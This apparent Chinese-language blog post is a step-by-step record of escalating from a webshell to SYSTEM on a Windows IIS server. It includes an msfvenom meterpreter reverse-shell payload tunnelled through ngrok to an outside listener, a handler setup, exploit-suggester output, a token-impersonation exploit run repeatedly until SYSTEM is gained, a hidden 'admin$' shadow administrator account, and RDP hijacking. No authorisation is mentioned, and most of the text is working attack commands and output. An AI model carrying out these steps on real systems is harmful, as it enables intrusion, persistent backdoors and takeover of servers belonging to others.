QQ love member No. 3 seed player

know it then do it && APT086&QQ愛安全实验室成员

Msf+ngrok 提权过程记录

12 Aug 2019 » 提权

[TOC]

PS:
这里主要记录下提权的过程,所以shell过程就不说了,前阵子经九世大佬传授内网渗透,复习AND总结。

0x1

拿到shell 查看了一个当前的权限 whoami

tiquan1

查看进程 tasklist 发现无杀毒软件。

tiquan2

0x2 MSF+ngrok 反弹获取 meterpreter

ngrok tcp 4444

tiquan3

msfvenom 制作木马&&上传到webshell中

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<SERVER IP> LPORT=<SERVER PORT> -f exe > /Users/ppbibo/Desktop/2.exe

msfconsole 接收会话

msf5 > use exploit/multi/handler 
msf5 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set LHOST 127.0.0.1
LHOST => 127.0.0.1
msf5 exploit(multi/handler) > set LPORT 4444
LPORT => 4444
msf5 exploit(multi/handler) > run

尝试 getsystem 失败,执行 shell 进入到 dos 命令查看当前打的补丁systeminfo

>systeminfo
                  [01]: KB2894852
                  [02]: KB2894856
                  [03]: KB2896496
                  [04]: KB2919355
                  [05]: KB2919442
                  [06]: KB2934517
                  [07]: KB2934520
                  [08]: KB2938066
                  [09]: KB2938772
                  [10]: KB2949621
                  [11]: KB2954879
                  [12]: KB2955164
                  [13]: KB2959626
                  [14]: KB2965500
                  [15]: KB2966826
                  [16]: KB2966828
                  [17]: KB2967917
                  [18]: KB2968296
                  [19]: KB2971203
                  [20]: KB2972103
                  [21]: KB2972213
                  [22]: KB2973114
                  [23]: KB2973448
                  [24]: KB2975061
    							....... 此处省略一大堆

提权辅助页面

进入到提权辅助页面进行比对,然后一个个的试= =

0x3 MSF自动识别系统存在哪些漏洞并提供最合适的exp

use multi/recon/local_exploit_suggester
// 实战中我们在拿到一个反弹shell后(meterpreter)下一步会进行提权操作,而metaspolit的内置模块Local Exploit Suggester。这个模块可以帮助我们识别系统存在哪些漏洞可以被利用,并且为我们提供最合适的exp,通过这个exp我们可以进一步提权。

推荐下面几个exp

[+] 127.0.0.1 - exploit/windows/local/ms10_092_schelevator: The target appears to be vulnerable.

[+] 127.0.0.1 - exploit/windows/local/ms16_014_wmi_recv_notif: The target appears to be vulnerable.

[+] 127.0.0.1 - exploit/windows/local/ms16_075_reflection: The target appears to be vulnerable.

[+] 127.0.0.1 - exploit/windows/local/ms16_075_reflection_juicy: The target appears to be vulnerable.

测试均提示利用成功但没有会话返回,用九世哥哥的一句话就是毛用没有。

然后去之前的提权辅助页面进行 ms16_075 搜索看能不能利用

tiquan4

链接:https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS16-075

利用方式在链接中给出来了 RT:

tiquan5

msf5 exploit(multi/handler) > set ExitOnsession false
ExitOnsession => false
msf5 exploit(multi/handler) > sessions 2
[*] Starting interaction with 2...

meterpreter > getuid
Server username: IIS APPPOOL\DefaultAppPool
meterpreter > load incognito 
Loading extension incognito...Success.
meterpreter > list_tokens -u
[-] Warning: Not currently running as SYSTEM, not all tokens will be available
             Call rev2self if primary process token is SYSTEM

Delegation Tokens Available
========================================
IIS APPPOOL\DefaultAppPool
NT AUTHORITY\IUSR

Impersonation Tokens Available
========================================
No tokens available

meterpreter > execute -cH -f ./potato.exe
Process 3832 created.
Channel 1 created.
meterpreter > list_tokens -u
[-] Warning: Not currently running as SYSTEM, not all tokens will be available
             Call rev2self if primary process token is SYSTEM

Delegation Tokens Available
========================================
IIS APPPOOL\DefaultAppPool
NT AUTHORITY\IUSR

Impersonation Tokens Available
========================================
NT AUTHORITY\SYSTEM

meterpreter > impersonate_token "NT AUTHORITY\\SYSTEM"
[-] Warning: Not currently running as SYSTEM, not all tokens will be available
             Call rev2self if primary process token is SYSTEM
[-] User token NT AUTHORITY\SYSTEM not found
meterpreter > impersonate_token "NT AUTHORITY\SYSTEM"
[-] Warning: Not currently running as SYSTEM, not all tokens will be available
             Call rev2self if primary process token is SYSTEM
[-] User token NT AUTHORITY\SYSTEM not found
meterpreter > impersonate_token "NT AUTHORITY\SYSTEM"
[-] Warning: Not currently running as SYSTEM, not all tokens will be available
             Call rev2self if primary process token is SYSTEM

Delegation Tokens Available
========================================
IIS APPPOOL\DefaultAppPool
NT AUTHORITY\IUSR

Impersonation Tokens Available
========================================
No tokens available

meterpreter > execute -cH -f ./potato.exe
Process 1980 created.
Channel 2 created.
meterpreter > list_tokens -u
[-] Warning: Not currently running as SYSTEM, not all tokens will be available
             Call rev2self if primary process token is SYSTEM

Delegation Tokens Available
========================================
IIS APPPOOL\DefaultAppPool
NT AUTHORITY\IUSR

Impersonation Tokens Available
========================================
NT AUTHORITY\SYSTEM

meterpreter > impersonate_token "NT AUTHORITY\\SYSTEM"
[-] Warning: Not currently running as SYSTEM, not all tokens will be available
             Call rev2self if primary process token is SYSTEM
[-] No delegation token available
[+] Successfully impersonated user NT AUTHORITY\SYSTEM
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

执行的时候SYSTEMImpersonation Tokens Available 会消失,多执行几遍就可以了,如上:

拿到SYSTEM权限执行shell 进入到DOS命令下添加影子账户即可

net user admin$ Passw@rd1. /add && net localgroup administrators admin$ /add

RDP远程桌面端口查询

远程连接 RT:

tiquan7

RID会话劫持,退出服务器。

总结

没啥总结的,做个笔记。


「 转载请声明博客地址及APT086&QQ愛安全实验室 」

Related Posts